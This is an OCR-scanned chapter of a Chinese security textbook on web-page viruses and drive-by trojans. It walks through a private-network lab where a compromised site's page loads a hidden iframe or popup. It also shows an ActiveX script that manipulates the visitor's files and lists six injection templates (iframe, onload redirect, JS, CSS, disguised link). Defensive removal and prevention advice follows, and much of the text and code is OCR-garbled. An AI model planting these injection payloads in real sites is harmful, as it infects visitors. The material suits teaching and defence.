Foreign Address: 连接 该 端口 的 远程 计算 机 的 IP 地 址 和 端口 号 。 

State; 表明 TCP 连接 的 状态 ,其 中 ,7626 端口 正在 监听 ,很 有 可 能 被 植 和 人 了 冰河 木马 ， 
此 时 ,要 立刻 断 开 网 络 ,清除 木马 。 

网 络 服务 .木马 与 端口 对 照 表 见 附录 。 


513 网 页 病毒 、 网 页 挂 ( 木 ) 马 


如 今 各 式 各 样 的 病毒 在 网 络 上 横行 ,其 中 ,网 页 病毒 .网 页 挂 ( 木 ) 马 在 新 型 的 病毒 大 军 
中 危害 面 最 广 ,传播 效果 最 佳 。 

网 页 病毒 .网 页 挂 ( 木 ) 马 之 所 以 非常 流行 是 因为 它们 的 技术 含量 比较 低 ,免费 空 间 和 个 
人 网 站 增多 ,上 网 人 群 的 安全 意识 比较 低 ,另外 ,国内 网 页 挂 ( 木 ) 马 大 多 是 针对 TE 浏览 器 。 

本 节 通 过 实例 介绍 网 页 病毒 .网 页 挂 ( 木 ) 马 。 


5.13.1 实例 : 网 页 病毒 .网 页 挂 马 


1. 实验 环境 
实验 环境 如 图 5-81 所 示 。 
192.168.10.1 
192.168.10.2 
«j 9 
Windows 2003 Windows XP 
Web 服 务 器 入 侵 者 
图 5-81 实验 环境 
2. 实验 过 程 


第 1 步 : 设置 IP 地址 。 在 Windows 2003 上 对 本 台 计 算 机 的 网 卡 设置 两 个 IP 地址 ,如 
图 5-82 所 示 ,目的 是 要 在 本 台 计算 机 上 架设 基于 IP 地 址 (192. 168. 10. 1,192. 168. 10. 2) 的 
两 个 网 站 。 

第 2 步 : 打开 “Internet 信息 服务 (IIS) 管 理 器 *。 在 Windows 2003 上 打开 “Internet 信 
息 服务 (IIS) 管 理 器 ”, 如 图 5-83 所 示 , 右 击 “ 默 认 网 站 ”, 选 择 右键 菜单 中 的 “属性 ”命令 ,如 
图 5-84 所 示 ,为 本 网 站 选择 的 IP 地 址 是 192. 168. 10. 1。 

第 3 步 : 创建 网 站 。 在 Windows 2003 上 , 右 击 “网 站 ”, 依 次 选择 “新 建 " 和 “属性 ”命令 ， 
如 图 5-85 所 示 ,开始 创 建 网 站 ,创建 过 程 如 图 5-86 一 图 5-91 所 示 。 

第 4 步 : 创建 www_muma 网 站 的 主 目录 。 在 Windows 2003 上 ,在 Inetpub 文件 夹 中 
创建 www_muma 子 文件 夹 ,如 图 5-92 所 示 , 该 文件 夹 就 是 第 3 步 新 建 网 站 的 主 目录 。 
wwwroot 是 默认 网 站 的 主 目录 。 
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IEEE! AE 
联 设 年 | |me Dex | 
reito 一 
rw 199. —— [EXEREIEITIITSSLLI [ic 
192. 168. 10.2 255.255.258.0 GD MO 查看 WW) Bow 帮助 0 |=| 
e» AmXTOR EmA» u 
sav | mv [Us nternet 信息 服务 
i E zrczoos (本 地 计算 机 ) [ag respec C:\Program File. 
点 认 网 关 相 一 一 一 一 一 一 一 一 一 一 一 一 一 一 EHI FTP 站 点 PEServer C:\Program File. 
BO 应 用 程序 池 ise CH WINIOES Syst 
8-0) Fi Rptithcert C: WINDOFS\Syst 
Dm 
Adninistration | kpowr om 


Sno jo | new | & i RU srr iens | Zm 
F 自动 路 点 计数 OD 5 ms. xm 
anwan: [— — June 
] weca. xm 
: m À paserror zi afl 
we | mx | [ i 
图 5-82 “R TCP/IP 设置 "对 话 框 图 5-83 Internet 信息 服务 (IIS) 管 理 器 


DETTTETTITSSLLI] 


(Gro wrw srv wow WD [481 xl 
e» OTOR Om| Z|» m i 
| 本 mre mees 


& SM zrczoos (本 地 计算 机 ) 默认 同 站 1 
| SD rr 站 点 全 Adnini strstion 11188 
€.) TAFA 
F BABER i Eee a 
活动 日 志 格式 W 所 有 任务 加 » AABT) O. 
Wc 扩展 目 志文 件 格式 可 meo Ri k 


zv 
从 这 里 创建 窗口 四) 


auo 
AUN. 
muto 
son 
图 5-84 “默认 网 站 属性 ”对 话 框 图 5-85 开始 创建 网 站 
EETTTI3 
欢迎 使 用 网 站 创建 向 导 mame 
FDHESERET UMSO RIRSDLA. 
MODE. 
HELSAESIEGIHALIL -IGR— FD. siw 


要 继续 ,请 单 击 “ 下 一 步 ”。 


rofen _ ra Li] 
图 5-86 ”网 站 创建 向 导 图 5-87 网 站 描述 
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CELLIE 


IP 地 址 和 端口 设置 
指定 新 网 站 的 IP 地 址 ,端口 设置 和 主机 头 。 


网 站 主 目录 
主 目录 是 Web 内 容 子 目录 的 根 目录 。 


Poi ir 地 丰台) WOGEBPONSG. 
TE IÍ 
BLU WENN: [ED mo] 


cam 


此 网 站 的 主机 头 (BRL. E) W: 


Tv 允许 下 名 访问 网 站 Q0 


有 关 更 多 信息 ， 请 参阅 ITS 产品 文档 - 


《上 一 步 邓 ) Li] 


图 5-88 IP 地 址 和 端口 设置 图 5-89 网 站 主 目录 


网 站 访问 权限 已 成 功 完成 网 站 创建 向 导 。 
设置 此 网 站 的 访问 权限 。 


区 许 下 列 权限 

LA n3 

运行 脚本 do ASP) D 

Tv BXtr O0 1571 E CoD QI 
FS 和 A 

r xo 


单 击 “ 下 一 步 ” 按钮 完成 疗 导 . 要 做 这 些 更 改 ， 请 单 击 “ 充 成 ”. 


I9] Run 


图 5-90 ”网 站 访问 权限 图 5-91 网 站 创建 完成 
第 5 步 : 复制 网 站 文件 。 在 Windows 2003 
上 ,读者 可 以 将 两 个 简单 的 网 站 文件 分 别 复制 到 ro demo) meo) umo IAD?| 以 
wwwroot 和 www muma 文件 夹 中 ， QmB-O-f|P^sk OXR |i» » ”| 
3 地 址 netpul 可 加 和 
编辑 wwwroot 文件 夹 中 的 INDEX. HTM eee = 
-Æi -Ja 4t Hh 9 —/ — ... [CxMainscripts XX -3-16 21:2 
文件 , 在 该 文件 源 代 码 的 二 /body > TIRES = exierit 
二 /body 二 之 间 插 入 如 图 5-93 所 示 的 被 圈 部 分 [Cent Mo MEAE 
iyw mma 2008-3-20 16:57 
代码 Brwroot 2008-3-20 16:49 


注意 : 这 一 步 的 前 提 是 入 侵 者 成 功 入 侵 了 
一 个 网 站 (本 例 中 是 指 上 默认 网 站 wwwroot) ,这 
样 就 可 以 对 入 侵 网 站 的 网 页 文件 进行 修改 , 植 入 
网 页 木马 或 病毒 等 。 如 何 成 功 入 侵 一 个 网 站 呢 ? 读者 可 以 使 用 前 面 介绍 的 方法 或 者 求助 于 
网 络 ,不 过 入 侵 和 莫 改 他 人 服务 器 上 的 信息 属于 违法 行为 ,本 书 之 所 以 介绍 这 些 内 容 , 是 让 
大 家 了 解 各 种 黑客 入 侵 技术 ,更 好 地 保障 自己 的 信息 系统 的 安全 ,也 希望 大 家 不 要 利用 这 些 
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图 5-92 创建 www_muma 子 文件 夹 


第 5 章 xx IER] 


技术 进行 入 侵 ,而 是 共同 维护 网 络 安全 。 
Ø rer. nTa - 记事 本 


</head> 


<body background-"img/bj.jpg" leftmargin="0" topnargin="0"> 


rame src=http://192.168.10.2/index.htm width=280 height=20 franeborder=1> 


<table width-"769" border="0" align="center" cellpadding-"0" cellspacing="0"> 
<tr> 


<td width-"769" background-"inmg/banneri.gif"»«img src="ing/banner2.gif" 


jwidth-"200" height="100"><img src="img/banner.gif" width-"517" height="100"></td> 
</tr> 
</table> 


图 5-93  wwwroot 文件 夹 中 的 INDEX. HTM 文件 


第 6 步 : 打开 浏览 器 。 在 Windows XP 上 ,打开 浏览 器 (IE 或 者 Firefox) ,在 地 址 栏 输 
入 192. 168. 10. 1 ,结果 如 图 5-94 所 示 。 


图 5-94 访问 wwwroot 网 站 一 一 网 页 幅 入 


注意 : 图 中 左上 角 的 被 圈 部 分 ,是 图 中 椭圆 部 分 代码 的 效果 。 

代码 : < iframe src = http://192. 168. 10. 2/INDEX. HTM width = 20 height = 
20 frameborder— 17 </iframe> Jt SC ib Je K Z Ip Jr i 05 Pe ox og se I] vi He 05 5 — RR 7T 
式 , 不 过 在 本 测试 中 ,仅仅 是 在 原 网 站 的 首页 中 嵌入 了 另外 一 个 网 页 ,如 果 把 width height 
和 frameborder 都 设置 为 0, 那么 在 原 网 站 的 首页 不 会 发 生 任何 变化 ,但 是 , 散 入 的 网 页 
(192. 168. 10. 2/INDEX. HTM.iZ INDEX. HTM 文件 称 为 网 页 病毒 或 网 页 木马 ) 实 际 上 已 
经 打开 了 ,如 果 192. 168. 10. 2/INDEX. HTM 中 包含 恶意 代码 ,那么 浏览 者 就 会 受到 不 同 
程度 的 攻击 。 如 果 192.168.10. 2/INDEX. H TM 是 网 页 木马 ,那么 所 有 访问 该 网 站 首页 的 
人 都 会 中 木马 。 网 页 上 的 下 载 木 马 和 运行 木马 的 脚本 还 是 会 随 着 门户 首页 的 打开 而 执 
行 的 。 

提示 : 一 iframe 盖 称 为 浮动 帧 标签 , 它 可 以 把 一 个 HTML. ARKAA -AARE RIL 
画 中 画 的 效果 (如 图 5-94 所 示 ), 被 嵌入 的 网 页 可 以 控制 宽 、 高 以 及 边框 大 小 和 是 否 出 现 滚 
动 条 等 。 

大 家 在 打开 一 些 著名 的 网 站 时 杀毒 软件 会 报警 ,或 者 在 使 用 Google 进行 搜索 后 ,搜索 结果 
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中 有 些 条 目 提示 说 此 网 站 会 损害 计算 机 ,主要 原因 在 于 这 些 网 站 的 网 页 中 被 植 入 了 木马 或 病毒 。 
第 7 步 : 编辑 wwwroot 中 的 INDEX. HTM 文件 。 在 Windows 2003 上 编辑 C:\ 
Inetpub\wwwroot\ INDEX. HTM 文件 ,插入 如 图 5-95 所 示 的 被 圈 部 分 代码 。 
P omer. wa - 记事 本 AEE 


XP RED BLW FFV R00 
[</head> 


<body background="ing/bj.jpg" 


图 5-95 wwwroot 文 件 夹 中 的 INDEX. HTM 文件 


wwwroot 中 INDEX. HTM 文件 的 代码 说 明 如 表 5-17 所 示 。 
表 5-17 INDEX. HTM 文件 代码 说 明 


& m 说 — 明 
<script language javascript JavaScript 脚本 开始 
window. open 弹出 新 窗口 
192. 168. 10. 2/INDEX. HTM 弹出 新 窗口 的 网 页 文件 
弹出 窗口 标题 栏 显示 的 名 字 ,在 此 为 空 
toolbar 一 no 不 显示 工具 栏 
location 一 no 不 显示 地 址 栏 
status 一 no 不 显示 状态 栏 
menubar 不 显示 菜单 栏 
scrollbars 不 显示 滚动 栏 
width 一 50 窗口 宽度 
height 一 50 窗口 高 度 
</script> JavaScript 脚本 结束 


第 8 步 : Minero 在 Windows XP 上 ,打开 浏览 器 (IE 或 者 FirefoxÓ ,地 址 栏 输入 
192. 168. 10. 1 ,结果 如 图 5-96 所 示 。 

注意 : -96 中 左上 角 的 被 圈 部 分 ,是 图 5-95 中 椭圆 部 分 代码 的 效果 。 

如 果 把 width、height 都 设置 为 1( 如 果 设置 为 0 访问 192. 168. 10. 1 的 网 站 时 弹出 的 木 
马 网 页 是 全 屏 ) ,那么 在 原 网 站 的 首页 基本 不 会 发 生 什 么 变化 ,但 是 ,嵌入 的 网 页 (192. 168. 
10. 2/INDEX. HTM. INDEX. HTM 文件 称 为 网 页 病毒 或 网 页 森马) 实际 上 已 经 打开 了 。 

第 9 步 : 编辑 www_muma 文件 夹 中 的 INDEX. HTM 文件 。 在 Windows 2003 上 , 编 
辑 C:\Inetpub\www_muma\ INDEX. HTM 文件 ,插入 如 图 5-97 所 示 的 被 圈 部 分 代码 。 
www_muma 文件 夹 中 INDEX. HTM 文件 的 代码 说 明 见 表 5-18。 
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Bookmarks Tools Help 


[I] http://192. 168. 10. 1/ 


Script language-javascript? 
<t- 
var fso,f1, F2, F3, 5 


«body» 


"v: 
<table width-"763" height-"587" border-"i" cellspacing-1 bordercolor="8009900"> E 


5-97. www muma 文件 夹 中 INDEX. HTM 文件 


5 5-18 
& m 


INDEX. HTM 文件 代码 说 明 


说 — 明 


<script language— javascript 


JavaScript 脚本 开始 


var fso, fl, f2, f3, s; 


定义 变量 


fso = new ActiveXObject("Scripting. FileSystemObject") ; 


创建 FileSystemObject 对 象 实例 


f1 = fso. CreateTextFileC"c:Vtestfile, txt", true); 创建 一 个 空 文本 文件 

fl. Write ("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa. "); 向 文件 testfile. txt 中 写 入 内 容 
fl. CloseO ; 关闭 文件 

12 = fso. GetFile("c:\testfile. txt") ; 获取 c:\testfile. txt 文件 句柄 
12. Move ("d:\testfile. txt"); 移动 文件 到 di Ntestfile. txt 中 
12. Copy ("d:\testfile2. txt") ; 复制 文件 到 d:\testfile2. txt 中 
12 = fso. GetFile("d:\testfile. txt") ; 获取 d:\testfile. txt 文件 句柄 
13 = fso. GetFile("d:\testfile2. txt") ; 获取 d:\testfile2. txt 文件 句柄 


// 人 2. DeleteO ; 


如 果 取 消 注释 , 则 删除 d:\testfile. txt 文件 


//f3. DeleteO ; 


如 果 取 消 注释 , 则 删除 d Ntestfile2. txt 文件 


</script> 


JavaScript 脚本 结束 
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第 10 步 : 打开 IE 浏览 器 。 在 Windows XP 上 打开 IE 浏览 器 ,地 址 栏 输入 192. 168. 


10.1, 此 时 ,网 页 木马 已 经 在 自己 的 计算 机 中 创建 了 两 个 文件 ,如 图 5-98 所 示 。 


* PROGRAN (D:) 


Xt) SEO EV EQ) IRW EY 
I 网 页 木马 创 
Qa- O- 3 Jm (xe pu. | 建 的 文件 


m OELE 
文件 和 文件 夹 任务 G Chose Express 


图 5-98 ”网 页 木马 创建 的 文件 
注意 : 在 Firefox 浏览 器 中 ,第 9 步 的 JavaScript 脚本 不 能 够 很 好 地 执行 。 由 此 可 见 ， 


目前 的 大 多 数 网 页 木马 或 网 页 病毒 是 针对 LE 浏览 器 的 ,所 以 ,为 了 上 网 安全 ,可 以 选择 使 用 
Firefox 浏览 器 ,不 过 有 些 时 候 Firefox 浏览 器 不 能 够 正常 访问 一 些 网 站 ,因此 读者 可 以 根据 
不 同 需求 选用 不 同 的 浏览 器 。 


3. 一 些 常 用 的 挂 马 方式 

(1) 框架 挂 马 

< iframe src = "网 马 地 址 ”width = 0 height = 0 ></iframe> 
(2) body #5 

< body onload = "window. location = ' 网 马 地 址 ';"></body> 


(3) Java 挂 马 


< script language = javascript» 
window. open ("网 马 地 址 ", "", "toolbar = no, location = no, directories = no, status = no, menubar = 
no, scrollbars = no, width = 1, height = 1"); 

</script> 


OD js 文件 挂 马 
首先 将 代码 “document. write(" 一 iframe width — 0 height — 0 src = ' R) = H ht '> 


—/iframe2-") ;"f& ff Jy muma. js 文件 , 则 js 文件 挂 马 代 码 为 “二 script language = 


javascript src= muma. js> </script>”. 
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(5) css 中 挂 马 


body( 
background - image: url(' 
javascript:document. write("< script src = http://www. yyy. net/muma. js » «/script»")') 


) 
C6) 高 级 欺骗 


< a href = http://www. sohu. com( 迷 惑 链接 地 址 ) onMouseOver = " muma ( ); return true;"»18 M Ñ 
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页 </a> 

< script language = javascript > 

function muma( ) 

{ 
open(" 网 马 地 址 ", "" , "toolbar = no, location = no, directories = no, status = no, menubar = no, 
scrollbars = no, width = 1,height = 1"); 

} 


</script> 
5.13.2. 网 页 病毒 、 网 页 挂 马 的 基本 概念 
1. 网 页 病毒 


网 页 病毒 是 利用 网 页 来 进行 破坏 的 病毒 , 它 存在 于 网 页 之 中 ,其 实 是 使 用 一 些 脚本 语言 
编写 的 一 些 恶 意 代 码 ,利用 浏览 器 漏洞 来 实现 病毒 的 植 入 。 当 用 户 登录 某 些 含有 网 页 病毒 
的 网 站 时 ,网 页 病毒 会 被 悄悄 激活 ,这 些 病 毒 一 旦 激活 ,可 以 利用 系统 的 一 些 资源 进行 破坏 。 
轻 则 修改 用 户 的 注册 表 , 使 用 户 的 首页 .浏览 器 标题 改变 , 重 则 可 以 关闭 系统 的 很 多 功能 , 装 
上 木马 , 染 上 病毒 ,使 用 户 无 法 正常 使 用 计算 机 系统 ,严重 者 则 可 以 将 用 户 的 系统 进行 格式 
化 。 而 这 种 网 页 病毒 容易 编写 和 修改 ,使 用 户 防不胜防 。 

2. 网 页 挂 马 ( 网 页 木马 ) 

网 页 挂 马 是 指 黑客 自己 建立 带 病毒 的 网 站 ,或 者 入 侵 大 流量 网 站 ,然后 在 其 网 页 中 植 入 
木马 和 病毒 , 当 用 户 浏览 到 这 些 网 页 时 就 会 中 毒 。 由 于 通过 网 页 挂 马 可 以 批量 入 侵 大 量 计 
算 机 ,快速 组 建 僵尸 网 络 、 窍 取 用 户 资料 ,所 以 危害 极 大 。 

网 页 挂 马 的 方法 花样 翻新 ,层出不穷 。 可 以 利用 Iframe 包含 网 页 木马 ,也 可 以 利用 JS 
脚本 文件 调用 网 页 木马 ,还 可 以 在 CSS 文件 中 插入 网 页 木马 ,甚至 可 以 利用 图 片 .SWF、 
RM、AVI 等 文件 的 弹 窗 功 能 来 打开 网 页 木马 。 

3. WSH(Windows Scripting Host. Windows 脚本 宿主 ) 

WSH JE Vii T. Windows 操作 系统 中 的 脚本 语言 工作 环境 。WSH 这 个 概念 最 早出 现 
T Windows 98 操作 系统 。 微 软 在 研发 Windows 98 时 ,为 了 实现 多 类 脚本 文件 在 
Windows 界面 或 DOS 命令 提示 符 下 直接 运行 ,就 在 系统 中 植 人 了 一 个 基于 32 位 Windows 
平台 的 、 独 立 于 语言 的 脚本 运行 环境 ,将 其 命名 为 Windows Scripting Host, WSH 架构 于 
ActiveX 之 上 ,通过 充当 ActiveX 的 脚本 引擎 控制 器 ,WSH 为 Windows 用 户 充分 利用 威力 
强大 的 脚本 语言 扫 清 了 障碍 。 

WSH 的 优点 在 于 它 能 够 使 人 们 可 以 充分 利用 脚本 来 实现 计算 机 工作 的 自动 化 ,但 正 
是 WSH 的 优点 ,使 计算 机 系统 又 有 了 新 的 安全 隐患 。 许 多 计算 机 病毒 制造 者 正在 热衷 于 
用 脚本 语言 来 编制 病毒 ,并 利用 WSH 的 支持 功能 ,让 这 些 隐藏 着 病毒 的 脚本 在 网 络 中 广 为 
传播 。 借助 WSH 的 这 一 缺陷 ,通过 JavaScript, VBScript, ActiveX 等 网 页 脚本 语言 ,就 产 
生 了 大 量 的 网 页 病毒 和 网 页 木马 。 

4. 网 页 木马 的 基本 工作 流程 

(1) 打开 含有 网 页 木马 的 网 页 。 

(2) 网 页 木马 利用 浏览 器 漏洞 或 者 一 些 脚 本 功能 下 载 一 个 可 执行 文件 或 脚本 。 

5. 网 页 木马 的 种 类 

(1) Flash 动画 木马 。Flash 动画 木马 的 攻击 原理 是 在 网 页 中 显示 或 在 本 地 直接 播放 
Flash 动画 木马 时 ,让 Flash 自动 打开 一 个 网 址 ,而 该 网 页 就 是 攻击 者 预先 制作 好 的 一 个 木 
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马 网 页 。 即 Flash 动画 木马 其 实 就 是 利用 Flash 的 跳 转 特性 ,进行 网 页 木马 的 攻击 。 要 让 
Flash 自动 跳 转 到 木马 网 页 ,只 要 使 用 Macromedia Flash MX 之 类 的 编辑 工具 ,在 Flash 中 
添加 一 段 跳 转 代码 ,让 Flash 跳 转 到 木马 网 页 即 可 。 

用 浏览 器 打开 Flash 动画 木马 或 是 包含 Flash 动画 木马 的 网 页 时 ,可 以 看 到 随 着 Flash 动画 
播放 ,自动 弹出 一 个 浏览 器 窗口 ,里 面 将 会 显示 一 个 无 关 的 网 页 ,这 个 网 页 很 可 能 就 是 木马 网 页 。 

不 管 Flash 木马 如 何 设计 ,最 终 都 是 要 跳 转 到 木马 网 页 去 ,所 以 防范 Flash 动画 木马 需 
要 开启 Windows 的 窗口 拦截 功能 ,另外 ,一 定 要 在 上 网 时 开启 杀毒 软件 的 网 页 监控 功能 。 

打开 IE 浏览 器 , 单 击 菜 单 “ 工 具 ” 一 “Internet 选项 ”, 打 开 “Internet 选项 ”对话 框 , 如 
图 5-99 所 示 。 选 择 “ 隐 私 ” 选 项 卡 , 在 页 面 中 色 选 “打开 弹出 窗口 阻止 程序 ”选项 ,然后 单 击 
“设置 ”按钮 ,打开 “弹出 窗口 阻止 程序 设置 ”对 话 框 ,如 图 5-100 所 示 , 在 对 话 框 中 可 以 设置 
筛选 级 别 ,将 其 设置 为 "高 : 阻止 所 有 弹出 窗口 ”。 


= 脱出 窗口 阻止 程序 设置 
[wA ise [RE [ne [sa [BF jm | 0 pm 
az a BREER TR P JA 
E) GA eene ERR. gi kater 
T 


FOIRE WD: 


4 ag i pe 


- 
SD ORG aman gonia Tocalhost 


Rm C3» | Eua 

MiRCRUHE 

(p) mamsen. CD 
Eire cu) D 通知 和 第 经 别 

[7L COR EROR E QD. 

Iz Bip DH ERR D. 


图 5-99 "Internet 选项 ”对 话 框 图 5-100 “弹出 窗口 阻止 程序 设置 "对话 框 


D 图 片 木 马 。 图 片 木 马 有 两 种 形式 : 伪装 型 图 片 木马 和 漏洞 型 图 片 木 马 。 

CD 伪装 型 图 片 木 马 。 伪 装 型 图 片 木马 通常 是 通过 修改 文件 图 标 , 伪 装 成 图 片 文件 来 实现 的 。 

© 漏洞 型 图 片 木 马 。 漏 洞 型 图 片 木马 通常 是 利用 系统 或 者 软件 的 漏洞 ,对 真正 的 图 片 
动 了 手脚 ,制作 出 真正 的 夹带 木马 的 图 片 , 当 用 户 打 开 图 片 时 就 会 受到 木马 的 攻击 。 

对 于 伪装 型 图 片 木 马 ,无 论 其 外 表 多 么 具有 迷惑 性 .但 是 木马 必然 是 个 可 执行 程序 ,后 
级 名 是 .exe。 因 此 ,可 以 比较 容易 地 发 现 伪 装 型 图 片 木马 。 在 资源 管理 器 窗口 中 ,依次 选择 
菜单 栏 中 的 “工具 ”一 “文件 夹 选项 ”, 打 开 “ 文 件 夹 选项 ”对话 框 ,如 图 5-101 所 示 , 取 消 选中 
“隐藏 受 保护 的 操作 系统 文件 "和 “隐藏 已 知 文件 类 型 的 扩展 名 ” 复 选 框 ,并 且 在 “隐藏 文件 和 
文件 夹 ”项 中 选择 “显示 所 有 文件 和 文件 夹 ”。 

有 些 木马 会 对 注册 表 进 行 修改 ,使 得 资源 管理 器 “工具 ”菜单 中 的 “文件 夹 选项 ”被 隐藏 ， 
让 用 户 无 法 显示 文件 后 缀 名 。 要 识别 木马 ,必须 恢复 "文件 夹 选 项 *。 布 击 工具 栏 空白 处 ,在 
菜单 中 选择 “ 自 定义 ”命令 ,打开 “ 自 定义 工具 栏 ” 对 话 框 ,如 图 5-102 所 示 。 在 “可 用 工具 栏 
按钮 ”中 找到 “文件 夹 选项 ”, 单 击 “ 添 加 ”按钮 ,然后 单 击 “ 关 闭 ” 按 钮 ,工具 栏 中 会 出 现 一 个 
“文件 夹 选项 ”按钮 。 
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[wm | 查看 。 | 立 件 关 型 | 脱 机 文件 
文件 夹 视图 
[e MN 


mum 
^ 


回 使 用 简单 文件 共享 END 
回 慑 奈 指 向 文件 天 和 点 面 项 时 显示 提示 信息 
Ba 


ec! 
D) eum truc 
O 二 音准 进 程 中 打开 文件 到 全 口 


KPRD [&NMUBRICTHETGM M 
BRW: | 大 图 标 C) 


图 5-101 “文件 夹 选项 对话 框 图 5-102 “ 自 定义 工具 栏 ” 对 话 框 
(3) 在 媒体 文件 .电子 书 、 电 子 邮 件 中 也 可 能 放置 木马 。 


5.13.3 方法 汇总 病毒 .蠕虫 和 木马 的 清除 和 预防 


1. 遭受 网 页 病毒 .网 页 木马 攻击 后 的 症状 

CD 上 网 前 系统 一 切 正常 ,下 网 后 系统 就 会 出 现 异常 情况 。 

(2) 默认 主页 被 更 改 ,IE 浏览 器 工具 栏 内 的 修改 功能 被 屏蔽 。 

(3) 不 定时 弹出 广告 。 

CA) 计算 机 桌面 及 桌面 上 的 图 标 被 隐藏 。 

(5) 在 计算 机 桌面 上 无 故 出 现 陌生 网 站 的 链接 。 

(6) 登录 某 个 网 站 后 ,发 现 迅速 打开 一 个 窗口 后 又 消失 ,并 且 在 系统 文件 夹 内 多 了 几 个 
未 知 的 、 类 似 系 统 文件 的 新 文件 。 

CD) 私有 账号 无 故 丢失 。 

(8) 发 现 多 了 几 个 未 知 的 进程 ,而 且 删 不 掉 , 重 启 后 又 会 出 现 。 

(9) CPU 利用 率 一 直 很 高 。 

(10) 注册 表 编 辑 器 被 锁定 。 

2. 清除 病毒 .蠕虫 和 木马 的 一 般 方法 

(1) 使 用 杀毒 软件 或 者 专 杀 工 具 查 杀 。 

(2) 查看 任务 管理 器 ,发 现 仿 系统 文件 的 进程 要 立刻 禁止 掉 , 然 后 到 相应 的 路 径 查 看 该 
文件 的 “创建 时 间 ”, 如 果 和 中 毒 时 间 相仿 ,那么 就 说 明 该 文件 极 有 可 能 是 病毒 文件 。 因 为 系 
统 文件 的 创建 时 间 比 较 早 ,要 比 当 前 时 间 早 2 一 5 年 , 按 如 此 办 法 就 可 以 逐一 地 找 出 可 疑 的 
文件 ,然后 将 它们 删除 。 如 果 在 Windows 中 不 能 删除 ,那么 要 进入 DOS 中 进行 删除 。 

G) 修改 注册 表 。 网 页 病毒 通过 注册 表 具 有 再 生 的 功能 ,所 以 要 注意 注册 表 启 动 项 : 


[HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 
[HKEY LOCAL MACHINE MSoftwareMicrosoftWiindowsVCurrentVersionMRunServicesOnce] 
[HKEY LOCAL MACHINE VSoftwareMicrosoftVWindowsVCurrentVersionNRun] 

[HKEY LOCAL MACHINE MSoftwareMMicrosoftWindowsVCurrentVersionNRunOnce] 

[HKEY CURRENT USERMSoftwareMicrosoftVWindowsVCurrentVersion V Run] 
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[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] 

[HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\RunServices] 

一 般 情况 ,上 面 的 所 有 的 键 值 都 为 空 。 如 果 不 为 空 ,应 该 全 部 清空 。 

另外 ,也 应 注意 关联 项 目 , 正 确 的 键 值 如 下 : 

[HKEY_CLRSSES_ROOTNchm. fileVshellVopenVcommand "(默认 )" "hh. exe" $1] 

[HKEY_CLASSES_ROOT\exefile\shell\open\command "(RIA)" "$1" $& * ] 

[HKEY CLASSES ROOTVinifileVshellVopenN command" (默认 )" 

5 SystemRoot % NSystem32NNOTEPAD. EXE & 1] 

[HKEY CLASSES ROOTMregfileVshellVopenNVcommand "(默认 )" regedit. exe "%1" ] 

[HKEY CLASSES ROOTMscrfileVshellVopenNVcommand "(默认 )" "%1" /Ss ] 

[HKEY CLASSES ROOTNMtxtfileVshellVopenNVcomnand "(默认 )" 

5 SystemRoot % \system32\NOTEPAD. EXE & 1] 

(4) 清理 配置 文件 启动 项 。 关 注 autoexec. bat, win. ini 和 system. ini Xf, autoexec. 
bat 的 内 容 为 空 ; win. ini 文件 中 [Windows] 下 面 “run 王 ”和 ”load 王 ”是 可 能 加 载 木马 程序 
的 途径 。 一 般 情况 下 ,等 号 后 面 什么 都 没有 ; system. ini 文件 中 [boot] 下 面 有 个 “shell 一 文 
件 名 ”。 正 确 的 文件 名 应 该 是 explorer. exe, 如 果 不 是 explorer. exe, 而 是 shell== explorer. 
exe 程序 名 ”, 那 么 后 面 跟着 的 那个 程序 就 是 木马 程序 ,就 是 说 计算 机 已 经 中 木马 了 。 

CO 清理 缓存 。 由 于 病毒 会 停留 在 计算 机 的 临时 文件 夹 与 缓存 目录 中 ,所 以 要 清理 
C:\Documents and Settings\Administrator( 或 其 他 用 户 名 )\Local Settings 文件 夹 中 Temp 
和 Temporary Internet Files 子 文件 夹 里 的 内 容 。 

(6) 检查 启动 组 。 开始 程 序 启 动 中 是 否 有 奇怪 的 启动 文件 ,现在 的 木马 大 多 不 再 通过 
启动 菜单 进行 随机 启动 ,但 是 也 不 可 掉以轻心 。 如 果 发 现在 “开始 /程序 /启动 ”中 有 新 增 的 
项 ,就 要 多 加 小 心 。 

(7) 通过 文件 对 比 查 找 木马 。 

(8) 清除 森马。 清除 木马 的 一 般 过 程 是 : 首先 确认 木马 进程 ,然后 停止 该 进程 ,再 在 注 
册 表 里 清理 相关 表 项 ,最 后 删除 硬盘 上 木马 文件 。 

(9) 查看 可 疑 端口 。 端 口 扫 描 是 检查 远程 机 器 有 无 木马 的 最 好 办 法 ,查看 连接 和 端口 
扫描 的 原理 基本 相同 ,不 过 是 在 本 地 机 上 的 命令 行 窗口 中 执行 “netstat - a” 命 令 来 查看 所 
有 的 TCP/UDP 连接 。 查 看 端口 与 进程 关系 的 小 程序 有 Active Ports 和 Tcpview 等 。 

(10) 在 安全 模式 或 纯 DOS 模式 下 清除 病毒 。 对 于 现在 大 多 数 流行 的 蠕虫 病毒 ,木马 
程序 和 网 页 代码 病毒 等 ,可 以 在 安全 模式 下 彻底 清除 ,然而 对 于 一 些 引 导 区 病毒 和 感染 可 执 
行文 件 的 病毒 则 需要 在 纯 DOS 下 杀毒 。 

3. 预防 网 页 病毒 、 网 页 木马 

(1) 安装 杀毒 软件 ,打开 实时 监控 。 

(2) 经 常 升级 杀毒 软件 的 病毒 库 。 

(3) 安装 防火 墙 。 

(4) 经 常 更 新 系统 ,安装 安全 补丁 。 

(5) 不 要 轻易 访问 具有 诱惑 性 的 网 站 。 

(6) 在 IE 中 全 部 禁止 ActiveX 插件 和 控件 Java 脚本 。 

CD 打开 IE 属性 对 话 框 中 选择 “安全 ”选项 卡 , 单 击 “ 受 限 站 点 ”, 将 “安全 级 别 ? 设 置 为 
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“高 ”, 单 击 “ 站 点 ”按钮 ,添加 要 阻止 的 危险 网 址 。 

(8) HIZ ActiveXObject。 在 命令 提示 符 下 执行 “regsvr32. exe shell32. dll /u/s” 命 令 ， 
HŽ Shell. application 控件 。 如 果 以 后 要 使 用 这 个 控件 ,在 命令 提示 符 下 执行 “regsvr32. exe 
shell32. dll /i/s” 命 令 重 新 安装 Shell. application 控件 。 其 中 ,regsvr32. exe 是 注册 或 反 注 
